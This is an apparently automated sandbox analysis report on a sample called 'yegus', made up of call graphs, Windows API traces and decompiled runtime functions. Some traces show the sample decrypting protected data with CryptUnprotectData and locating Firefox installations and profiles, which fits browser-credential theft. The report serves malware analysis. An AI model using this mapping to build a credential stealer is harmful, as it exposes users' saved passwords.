    control_flow_graph 766 10088170-10088189 767 1008818b-1008819b call 1008ab4c 766->767 768 1008819f-100881a4 766->768 767->768 776 1008819d 767->776 770 100881b1-100881d5 MultiByteToWideChar 768->770 771 100881a6-100881ae 768->771 773 100881db-100881e7 770->773 774 10088368-1008837b call 100827ba 770->774 771->770 777 100881e9-100881fa 773->777 778 1008823b 773->778 776->768 781 100881fc-1008820b call 1008e7e0 777->781 782 10088219-1008822a call 10086449 777->782 780 1008823d-1008823f 778->780 784 10088245-10088258 MultiByteToWideChar 780->784 785 1008835d 780->785 781->785 791 10088211-10088217 781->791 782->785 792 10088230 782->792 784->785 789 1008825e-10088270 call 10087064 784->789 790 1008835f-10088366 call 10085296 785->790 797 10088275-10088279 789->797 790->774 795 10088236-10088239 791->795 792->795 795->780 797->785 798 1008827f-10088286 797->798 799 10088288-1008828d 798->799 800 100882c0-100882cc 798->800 799->790 803 10088293-10088295 799->803 801 100882ce-100882df 800->801 802 10088318 800->802 806 100882fa-1008830b call 10086449 801->806 807 100882e1-100882f0 call 1008e7e0 801->807 805 1008831a-1008831c 802->805 803->785 804 1008829b-100882b5 call 10087064 803->804 804->790 819 100882bb 804->819 808 10088356-1008835c call 10085296 805->808 809 1008831e-10088337 call 10087064 805->809 806->808 821 1008830d 806->821 807->808 820 100882f2-100882f8 807->820 808->785 809->808 823 10088339-10088340 809->823 819->785 824 10088313-10088316 820->824 821->824 825 10088342-10088343 823->825 826 1008837c-10088382 823->826 824->805 827 10088344-10088354 WideCharToMultiByte 825->827 826->827 827->808 828 10088384-1008838b call 10085296 827->828 828->790
    APIs
    • MultiByteToWideChar.KERNEL32(00000100,00000000,?,?,00000000,00000000,00000000,00000100,00000000,?,?,?,100883C1,00000100,00000100,?), ref: 100881CA
    • MultiByteToWideChar.KERNEL32(00000100,00000001,?,?,00000000,?,?,?,?,100883C1,00000100,00000100,?,00000100,?,?), ref: 10088250
      • Part of subcall function 10087064: LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,00000100,?,00000100,00000100,10001C26), ref: 100870D5
      • Part of subcall function 10086449: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,10088306,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 1008647B
    • WideCharToMultiByte.KERNEL32(00000100,00000000,00000000,00000000,00000100,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 1008834A
    • __freea.LIBCMT ref: 10088357
    • __freea.LIBCMT ref: 10088360
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    • __freea.LIBCMT ref: 10088385
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • CoCreateInstance.OLE32(100902A0,00000000,00000017,100902B0,?), ref: 100014C8
    • StrStrIW.SHLWAPI(?,http), ref: 1000157B
      • Part of subcall function 10001200: lstrlenW.KERNEL32(00000000,?,00000000,76F846E9), ref: 1000125A
      • Part of subcall function 10001200: lstrlenW.KERNEL32(00000000), ref: 100012FF
      • Part of subcall function 10001200: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000132B
      • Part of subcall function 10001200: HeapFree.KERNEL32(00000000,00000000), ref: 1000133E
      • Part of subcall function 10001200: HeapFree.KERNEL32(00000000,00000000), ref: 10001355
      • Part of subcall function 10001200: HeapFree.KERNEL32(00000000,00000000), ref: 1000144E
      • Part of subcall function 10001200: HeapFree.KERNEL32(00000000,00000000), ref: 10001465
      • Part of subcall function 10001200: HeapFree.KERNEL32(00000000,00000000), ref: 10001474
      • Part of subcall function 10001200: LocalFree.KERNEL32(00000000), ref: 1000147D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 100891FC
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1008921F
      • Part of subcall function 10086449: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,10088306,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 1008647B
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 10089245
      • Part of subcall function 1008640F: HeapFree.KERNEL32(00000000,00000000), ref: 10086425
      • Part of subcall function 1008640F: GetLastError.KERNEL32(00000000,?,1008A93D,00000000,00000000,00000000,00000000,?,1008A964,00000000,00000007,00000000,?,1008A2E9,00000000,00000000), ref: 10086437
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 10089267
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 65%
    			E01336B36(signed int _a4) {
    				void* _t10;
    				void* _t13;
    				signed int _t15;
    				signed int _t21;
    				WCHAR* _t22;
    				signed int* _t25;
    				void* _t27;
    
    				_t21 = _a4;
    				_t25 = 0x1347c24 + _t21 * 4;
    				asm("lock cmpxchg [edi], ecx");
    				if(0 == 0) {
    					_t22 =  *(0x1340264 + _t21 * 4);
    					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
    					_t27 = _t10;
    					if(_t27 != 0) {
    						L8:
    						 *_t25 = _t27;
    						if( *_t25 != 0) {
    							FreeLibrary(_t27);
    						}
    						_t13 = _t27;
    						L11:
    						return _t13;
    					}
    					_t15 = GetLastError();
    					if(_t15 != 0x57) {
    						_t27 = 0;
    					} else {
    						_t15 = LoadLibraryExW(_t22, _t27, _t27);
    						_t27 = _t15;
    					}
    					if(_t27 != 0) {
    						goto L8;
    					} else {
    						 *_t25 = _t15 | 0xffffffff;
    						_t13 = 0;
    						goto L11;
    					}
    				}
    				asm("sbb eax, eax");
    				return  ~0x00000001 & 0;
    			}


    0x01336b3a
    0x01336b42
    0x01336b49
    0x01336b51
    0x01336b5e
    0x01336b6e
    0x01336b74
    0x01336b78
    0x01336ba1
    0x01336ba3
    0x01336ba7
    0x01336baa
    0x01336baa
    0x01336bb0
    0x01336bb2
    0x00000000
    0x01336bb2
    0x01336b7a
    0x01336b83
    0x01336b92
    0x01336b85
    0x01336b88
    0x01336b8e
    0x01336b8e
    0x01336b96
    0x00000000
    0x01336b98
    0x01336b9b
    0x01336b9d
    0x00000000
    0x01336b9d
    0x01336b96
    0x01336b58
    0x00000000

    APIs
    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,01347C08,?,?,01336ADD,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx), ref: 01336B6E
    • GetLastError.KERNEL32(?,?,01336ADD,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx,01340360,InitializeCriticalSectionEx,00000000,?,01336A24), ref: 01336B7A
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,?,01336ADD,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx,01340360,InitializeCriticalSectionEx), ref: 01336B88
    • FreeLibrary.KERNEL32(00000000,?,?,01336ADD,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx,01340360,InitializeCriticalSectionEx,00000000), ref: 01336BAA
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
    • LoadLibraryExW.KERNELBASE(?,00000000,00000800,?,00000001,?,?,1008430D,?,00000001,00000000,?,?,1008443B,00000005,FlsFree), ref: 1008439E
    • GetLastError.KERNEL32(?,1008430D,?,00000001,00000000,?,?,1008443B,00000005,FlsFree,1009041C,FlsFree,00000000,?,10084076,00000005), ref: 100843AA
    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,1008430D,?,00000001,00000000,?,?,1008443B,00000005,FlsFree,1009041C,FlsFree,00000000), ref: 100843B8
    • FreeLibrary.KERNEL32(00000000,?,1008430D,?,00000001,00000000,?,?,1008443B,00000005,FlsFree,1009041C,FlsFree,00000000,?,10084076), ref: 100843DA
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 95%
    			E0133A70A(signed int _a4) {
    				signed int _t9;
    				void* _t10;
    				void* _t13;
    				signed int _t15;
    				WCHAR* _t22;
    				signed int _t24;
    				signed int* _t25;
    				void* _t27;
    
    				_t9 = _a4;
    				_t25 = 0x1348280 + _t9 * 4;
    				_t24 =  *_t25;
    				if(_t24 == 0) {
    					_t22 =  *(0x1341298 + _t9 * 4);
    					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
    					_t27 = _t10;
    					if(_t27 != 0) {
    						L8:
    						 *_t25 = _t27;
    						if( *_t25 != 0) {
    							FreeLibrary(_t27);
    						}
    						_t13 = _t27;
    						L11:
    						return _t13;
    					}
    					_t15 = GetLastError();
    					if(_t15 != 0x57) {
    						_t27 = 0;
    					} else {
    						_t15 = LoadLibraryExW(_t22, _t27, _t27);
    						_t27 = _t15;
    					}
    					if(_t27 != 0) {
    						goto L8;
    					} else {
    						 *_t25 = _t15 | 0xffffffff;
    						_t13 = 0;
    						goto L11;
    					}
    				}
    				_t4 = _t24 + 1; // 0x262637d4
    				asm("sbb eax, eax");
    				return  ~_t4 & _t24;
    			}


    0x0133a70f
    0x0133a713
    0x0133a71a
    0x0133a71e
    0x0133a72c
    0x0133a73c
    0x0133a742
    0x0133a746
    0x0133a76f
    0x0133a771
    0x0133a775
    0x0133a778
    0x0133a778
    0x0133a77e
    0x0133a780
    0x00000000
    0x0133a781
    0x0133a748
    0x0133a751
    0x0133a760
    0x0133a753
    0x0133a756
    0x0133a75c
    0x0133a75c
    0x0133a764
    0x00000000
    0x0133a766
    0x0133a769
    0x0133a76b
    0x00000000
    0x0133a76b
    0x0133a764
    0x0133a720
    0x0133a725
    0x00000000

    APIs
    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00000000,00000000,00000000,?,0133A6B1,00000000,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue), ref: 0133A73C
    • GetLastError.KERNEL32(?,0133A6B1,00000000,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000,00000364,?,013395EA), ref: 0133A748
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0133A6B1,00000000,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000), ref: 0133A756
    • FreeLibrary.KERNEL32(00000000,?,0133A6B1,00000000,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000,00000364), ref: 0133A778
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,10084CC8,00000000,00000000,?,10086D5F,10084CC8,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue), ref: 10086DEA
    • GetLastError.KERNEL32(?,10086D5F,10084CC8,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000,00000364,?,10086C85), ref: 10086DF6
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10086D5F,10084CC8,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000), ref: 10086E04
    • FreeLibrary.KERNEL32(00000000,?,10086D5F,10084CC8,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000,00000364), ref: 10086E26
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,100A2268,?,?,1000B488,?,?,00000000), ref: 1000CC4D
    Strings
    • winDelete, xrefs: 1000CCE4
    • delayed %dms for lock/sharing conflict at line %d, xrefs: 1000CC27
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
    • ReadFile.KERNEL32(?,?,?,?,?), ref: 1000A5B3
    Strings
    • winRead, xrefs: 1000A61E
    • delayed %dms for lock/sharing conflict at line %d, xrefs: 1000A653
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    APIs
      • Part of subcall function 100823B0: RegOpenKeyExA.KERNEL32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,?,?), ref: 100823F6
      • Part of subcall function 100823B0: RegEnumKeyA.ADVAPI32(?,00000000,?,00001000), ref: 1008241E
      • Part of subcall function 100823B0: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?,?,00000000,00001000,?,00000000,00001000,00000000,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000), ref: 10082470
      • Part of subcall function 100823B0: RegQueryValueExA.KERNEL32(?,DisplayName,00000000,00000000,?,?,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,?,?), ref: 100824A5
      • Part of subcall function 100823B0: StrStrIA.SHLWAPI(?,firefox), ref: 100824CA
      • Part of subcall function 100823B0: RegQueryValueExA.KERNEL32(?,InstallLocation,00000000,00000000,?,?), ref: 100824FB
      • Part of subcall function 100823B0: RegQueryValueExA.ADVAPI32(?,UninstallString,00000000,00000000,?,00001000), ref: 10082534
      • Part of subcall function 100823B0: RegEnumKeyA.ADVAPI32(?,00000001,?,00001000), ref: 10082556
      • Part of subcall function 100823B0: lstrlenA.KERNEL32(?), ref: 1008259F
      • Part of subcall function 10001AA0: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 10001B02
      • Part of subcall function 10001AA0: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10001B0F
      • Part of subcall function 10001AA0: lstrlenA.KERNEL32(\Mozilla\Firefox\,?,?,?,?,?,?,?,00000000), ref: 10001B22
      • Part of subcall function 10001AA0: GetPrivateProfileStringA.KERNEL32(Profile0,Path,10094D91,?,00000105,?), ref: 10001B7A
      • Part of subcall function 10001AA0: wsprintfA.USER32 ref: 10001BAF
    • HeapFree.KERNEL32(00000000,?), ref: 10001D40
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
      • Part of subcall function 10001670: lstrlenA.KERNEL32(?,00000000,00000000,10001CC5,00000000), ref: 10001677
      • Part of subcall function 10001670: SetCurrentDirectoryA.KERNELBASE(00000000), ref: 10001691
      • Part of subcall function 100821C0: wvnsprintfA.SHLWAPI(?,?,?,?), ref: 100821E8
      • Part of subcall function 100821C0: lstrlenA.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,10001B55,?,00000105,%s\profiles.ini,?,?,\Mozilla\Firefox\), ref: 100821F9
      • Part of subcall function 100018A0: lstrlenA.KERNEL32(00000000), ref: 10001908
      • Part of subcall function 100018A0: lstrlenA.KERNEL32(00000000), ref: 1000192F
      • Part of subcall function 100018A0: lstrlenA.KERNEL32(00000000), ref: 10001956
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,?), ref: 100019B7
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,?), ref: 100019C4
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,00000000), ref: 100019EA
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,00000000), ref: 100019F8
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,00000000), ref: 10001A03
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,00000000), ref: 10001A11
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,00000000), ref: 10001A1E
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,00000000), ref: 10001A2E
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,00000000), ref: 10001A40
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,?), ref: 10001A52
      • Part of subcall function 100018A0: HeapFree.KERNEL32(00000000,00000000), ref: 10001A61
      • Part of subcall function 100018A0: UnmapViewOfFile.KERNEL32(?), ref: 10001A93
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 96%
    			E0133A007(signed int __edx, intOrPtr _a4) {
    				signed int _v8;
    				char _v264;
    				char _v520;
    				char _v776;
    				char _v1800;
    				char _v1814;
    				struct _cpinfo _v1820;
    				intOrPtr _v1824;
    				signed int _v1828;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t63;
    				void* _t67;
    				signed int _t68;
    				intOrPtr _t69;
    				void* _t72;
    				char _t73;
    				char _t74;
    				signed char _t75;
    				signed int _t76;
    				signed char _t86;
    				char _t87;
    				char _t89;
    				signed int _t92;
    				signed int _t93;
    				signed int _t94;
    				void* _t95;
    				char* _t96;
    				intOrPtr _t98;
    				signed int _t99;
    
    				_t94 = __edx;
    				_t63 =  *0x1347004; // 0x262637d3
    				_v8 = _t63 ^ _t99;
    				_t98 = _a4;
    				if(GetCPInfo( *(_t98 + 4),  &_v1820) == 0) {
    					_t95 = _t98 + 0x119;
    					_t89 = 0;
    					_t67 = 0xffffff9f;
    					_t68 = _t67 - _t95;
    					__eflags = _t68;
    					_v1828 = _t68;
    					do {
    						_t96 = _t95 + _t89;
    						_t69 = _t68 + _t96;
    						_v1824 = _t69;
    						__eflags = _t69 + 0x20 - 0x19;
    						if(_t69 + 0x20 > 0x19) {
    							__eflags = _v1824 - 0x19;
    							if(_v1824 > 0x19) {
    								 *_t96 = 0;
    							} else {
    								_t72 = _t98 + _t89;
    								_t57 = _t72 + 0x19;
    								 *_t57 =  *(_t72 + 0x19) | 0x00000020;
    								__eflags =  *_t57;
    								_t59 = _t89 - 0x20; // -32
    								_t73 = _t59;
    								goto L24;
    							}
    						} else {
    							 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000010;
    							_t54 = _t89 + 0x20; // 0x20
    							_t73 = _t54;
    							L24:
    							 *_t96 = _t73;
    						}
    						_t68 = _v1828;
    						_t95 = _t98 + 0x119;
    						_t89 = _t89 + 1;
    						__eflags = _t89 - 0x100;
    					} while (_t89 < 0x100);
    				} else {
    					_t74 = 0;
    					do {
    						 *((char*)(_t99 + _t74 - 0x104)) = _t74;
    						_t74 = _t74 + 1;
    					} while (_t74 < 0x100);
    					_t75 = _v1814;
    					_t92 =  &_v1814;
    					_v264 = 0x20;
    					while(1) {
    						_t105 = _t75;
    						if(_t75 == 0) {
    							break;
    						}
    						_t94 =  *(_t92 + 1) & 0x000000ff;
    						_t76 = _t75 & 0x000000ff;
    						while(1) {
    							__eflags = _t76 - _t94;
    							if(_t76 > _t94) {
    								break;
    							}
    							__eflags = _t76 - 0x100;
    							if(_t76 < 0x100) {
    								 *((char*)(_t99 + _t76 - 0x104)) = 0x20;
    								_t76 = _t76 + 1;
    								__eflags = _t76;
    								continue;
    							}
    							break;
    						}
    						_t92 = _t92 + 2;
    						__eflags = _t92;
    						_t75 =  *_t92;
    					}
    					E0133B083(_t94, _t105, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t98 + 4), 0);
    					E0133D17C(0, _t105, 0,  *((intOrPtr*)(_t98 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t98 + 4), 0); // executed
    					E0133D17C(0, _t105, 0,  *((intOrPtr*)(_t98 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t98 + 4), 0);
    					_t93 = 0;
    					do {
    						_t86 =  *(_t99 + _t93 * 2 - 0x704) & 0x0000ffff;
    						if((_t86 & 0x00000001) == 0) {
    							__eflags = _t86 & 0x00000002;
    							if((_t86 & 0x00000002) == 0) {
    								 *((char*)(_t98 + _t93 + 0x119)) = 0;
    							} else {
    								_t37 = _t98 + _t93 + 0x19;
    								 *_t37 =  *(_t98 + _t93 + 0x19) | 0x00000020;
    								__eflags =  *_t37;
    								_t87 =  *((intOrPtr*)(_t99 + _t93 - 0x304));
    								goto L15;
    							}
    						} else {
    							 *(_t98 + _t93 + 0x19) =  *(_t98 + _t93 + 0x19) | 0x00000010;
    							_t87 =  *((intOrPtr*)(_t99 + _t93 - 0x204));
    							L15:
    							 *((char*)(_t98 + _t93 + 0x119)) = _t87;
    						}
    						_t93 = _t93 + 1;
    					} while (_t93 < 0x100);
    				}
    				return E01333E82(0, _v8 ^ _t99, 0x100, _t98);
    			}

    APIs
    • GetCPInfo.KERNEL32(?,?), ref: 0133A02C
      • Part of subcall function 0133B083: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000100,?,00000000,?,?,00000000), ref: 0133B0D0
      • Part of subcall function 0133B083: MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0133B159
      • Part of subcall function 0133B083: GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0133B16B
      • Part of subcall function 0133B083: __freea.LIBCMT ref: 0133B174
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10088B90
      • Part of subcall function 1008AA2F: MultiByteToWideChar.KERNEL32(?,00000000,?,10087DA6,00000000,00000000,10086575,?,00000000,?,00000001,10087DA6,?,00000001,10086575,00000000), ref: 1008AA7C
      • Part of subcall function 1008AA2F: MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1008AB05
      • Part of subcall function 1008AA2F: GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,10084ED3,?), ref: 1008AB17
      • Part of subcall function 1008AA2F: __freea.LIBCMT ref: 1008AB20
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 34%
    			E0133A942(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
    				signed int _v8;
    				void* __esi;
    				signed int _t18;
    				intOrPtr* _t20;
    				intOrPtr* _t33;
    				void* _t34;
    				signed int _t35;
    
    				_t31 = __edi;
    				_t27 = __ecx;
    				_t26 = __ebx;
    				_push(__ecx);
    				_t18 =  *0x1347004; // 0x262637d3
    				_v8 = _t18 ^ _t35;
    				_t20 = E0133A66E(0x16, "LCMapStringEx", 0x134177c, "LCMapStringEx"); // executed
    				_t33 = _t20;
    				if(_t33 == 0) {
    					LCMapStringW(E0133A9CA(__ebx, _t27, __edi, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
    				} else {
    					 *0x1340140(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
    					 *_t33();
    				}
    				_pop(_t34);
    				return E01333E82(_t26, _v8 ^ _t35, _t31, _t34);
    			}

    APIs
      • Part of subcall function 0133A66E: GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000,00000364,?,013395EA,00000000), ref: 0133A6CE
    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0133A9B3
      • Part of subcall function 01333E82: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0133412E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    APIs
      • Part of subcall function 10086D1C: GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000,00000364,?,10086C85,00000000), ref: 10086D7C
    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,00000100,?,00000100,00000100,10001C26), ref: 100870D5
      • Part of subcall function 100827BA: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100827FE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    C-Code - Quality: 17%
    			E0133A8E0(void* __ebx, void* __ecx, void* __edi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
    				signed int _v8;
    				void* __esi;
